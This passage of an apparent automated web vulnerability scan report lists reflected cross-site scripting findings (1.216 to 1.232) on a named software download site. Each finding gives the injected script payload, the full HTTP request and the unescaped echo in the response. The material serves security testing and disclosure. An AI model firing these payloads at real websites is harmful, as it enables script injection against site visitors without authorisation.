Content-Type: text/html; charset=UTF-8
Content-Length: 79907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1" />
...[SNIP]...

1.216. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff48"><script>alert(1)</script>712b29e0247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html" />
...[SNIP]...

1.217. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88d4"><script>alert(1)</script>bde65231c50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50" />
...[SNIP]...

1.218. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a91"><script>alert(1)</script>06180f2151b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1" />
...[SNIP]...

1.219. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1be"><script>alert(1)</script>1593af6f4d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html" />
...[SNIP]...

1.220. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca45"><script>alert(1)</script>88a1d2dd8e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0" />
...[SNIP]...

1.221. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80afd"><script>alert(1)</script>c425ef0f66e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:14 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1" />
...[SNIP]...

1.222. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218d1"><script>alert(1)</script>4fe331af1de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:38:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html" />
...[SNIP]...

1.223. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba48e"><script>alert(1)</script>61cde841274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274" />
...[SNIP]...

1.224. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6112f"><script>alert(1)</script>21955c1c69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1" />
...[SNIP]...

1.225. http://www.x64bitdownload.com/contact.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27828"><script>alert(1)</script>f86c420dbde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html27828"><script>alert(1)</script>f86c420dbde HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html27828"><script>alert(1)</script>f86c420dbde" />
...[SNIP]...

1.226. http://www.x64bitdownload.com/contact.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa263"><script>alert(1)</script>331e6222b82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?aa263"><script>alert(1)</script>331e6222b82=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html?aa263"><script>alert(1)</script>331e6222b82=1" />
...[SNIP]...

1.227. http://www.x64bitdownload.com/contact.html [subject parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1b9"><script>alert(1)</script>4fd62328ec8 was submitted in the subject parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8" />
...[SNIP]...

1.228. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b3ae"><script>alert(1)</script>c6880b6a8ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:46:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html" />
...[SNIP]...

1.229. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60197"><script>alert(1)</script>0962c697c9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:41 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d" />
...[SNIP]...

1.230. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 609f9"><script>alert(1)</script>bd02fd97db3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:14 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1" />
...[SNIP]...

1.231. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9bd"><script>alert(1)</script>d2897fb4cc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html" />
...[SNIP]...

1.232. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a075"><script>alert(1)</script>b0edf73ede1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1"/>
...[SNIP]...

